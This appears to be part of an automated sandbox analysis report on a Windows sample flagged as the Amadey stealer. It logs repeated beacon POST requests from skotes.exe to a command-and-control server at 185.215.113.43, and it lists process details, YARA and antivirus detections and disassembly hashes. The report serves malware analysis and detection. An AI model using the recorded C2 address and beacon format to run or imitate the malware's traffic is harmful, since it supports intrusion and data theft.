                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.649875185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:15.027318954 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:16.419018984 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:16 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.649886185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:18.170521975 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:19.548300028 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:19 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.649892185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:21.183948994 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:22.519133091 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:22 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.649900185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:24.261709929 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:25.604116917 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:25 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.649910185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:27.240940094 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:28.664896965 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:28 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.649916185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:30.421768904 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:31.798350096 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:31 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.649923185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:33.433871031 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:34.773086071 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:34 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.649933185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:36.511797905 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:37.900830030 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:37 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.649939185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:39.528475046 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:40.908083916 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:40 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.649947185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:42.654645920 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:44.030520916 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:43 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.649956185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:45.652378082 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:46.997339964 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:46 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.649962185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:48.746124029 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:50.132993937 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:49 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.649972185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:51.763736963 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:53.163110971 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:52 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.649980185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:54.902472019 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:56.278815985 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:56 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.649986185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:57.949256897 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:59.331363916 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.649996185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:24:01.092000961 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:24:02.479404926 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:24:02 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:20:21:55
                                                Start date:23/11/2024
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                Imagebase:0xb40000
                                                File size:1'884'672 bytes
                                                MD5 hash:6D76634E0D5A3748DBB40ED91D91480A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2193715965.0000000000B41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2153521892.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:20:21:59
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                Imagebase:0xd60000
                                                File size:1'884'672 bytes
                                                MD5 hash:6D76634E0D5A3748DBB40ED91D91480A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2227793699.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2186521563.0000000004850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 55%, ReversingLabs
                                                • Detection: 54%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:20:22:00
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Imagebase:0xd60000
                                                File size:1'884'672 bytes
                                                MD5 hash:6D76634E0D5A3748DBB40ED91D91480A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2234945312.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2194651545.0000000005580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:20:23:00
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Imagebase:0xd60000
                                                File size:1'884'672 bytes
                                                MD5 hash:6D76634E0D5A3748DBB40ED91D91480A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2797199366.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Executed Functions

                                                  Function 053E0291 Relevance: .2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a9370cd4e3f36150e499fa0a1f057589f2347d778531eb06b792ba25b5063a8
                                                  • Instruction ID: 4fc745828c56d9584ff8c5bbe1c7ffb88ffc1242b2367db676f074093ac27f1e
                                                  • Opcode Fuzzy Hash: 5a9370cd4e3f36150e499fa0a1f057589f2347d778531eb06b792ba25b5063a8
                                                  • Instruction Fuzzy Hash: A0318DEB10C131BE760AC5C12B5CAFA67EEE0C6730330882BF447D9C82E2D95E5A5572
                                                  Function 053E02B8 Relevance: .1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 861db35f0abc8784556aba60be40dc91e1c556b8b1b59ea13ccde26b6e1d50ae
                                                  • Instruction ID: 362d39a0c692f1fd087b77d1dbb63dee48becb6f12cc3a9694910baa9837a18e
                                                  • Opcode Fuzzy Hash: 861db35f0abc8784556aba60be40dc91e1c556b8b1b59ea13ccde26b6e1d50ae
                                                  • Instruction Fuzzy Hash: 92215CEB10C135BE7246C5C12B19EFA66AEE5C67303318827F802D5C82E3C84E6E5932
                                                  Function 053E02D6 Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87ffe7fccdb2454fa26fa45983aabd46f549ad815a22559f20aab903429f2ab1
                                                  • Instruction ID: 797a3feb072b83258a490cfe638114e4c6cbfae4c3d0fc9fc35392cf86833026
                                                  • Opcode Fuzzy Hash: 87ffe7fccdb2454fa26fa45983aabd46f549ad815a22559f20aab903429f2ab1
                                                  • Instruction Fuzzy Hash: 2F211AAB14C135BE7245C5C12B5CAFA66EFE5D67307318826F802D4C82E2D94E5A1932
                                                  Function 053E02AC Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de64dd813fc2536cbddc2b2f7e6b30a196db06282c440b27183f5f155dff39d2
                                                  • Instruction ID: 058c09be5c875aacf8a3be638d6733045c6b655f7afcf833076195057831dfe8
                                                  • Opcode Fuzzy Hash: de64dd813fc2536cbddc2b2f7e6b30a196db06282c440b27183f5f155dff39d2
                                                  • Instruction Fuzzy Hash: 931126AB14C135BE714AC5C12B58AFA66EFE1C56303318826F803E4D82E2D94E6A5932
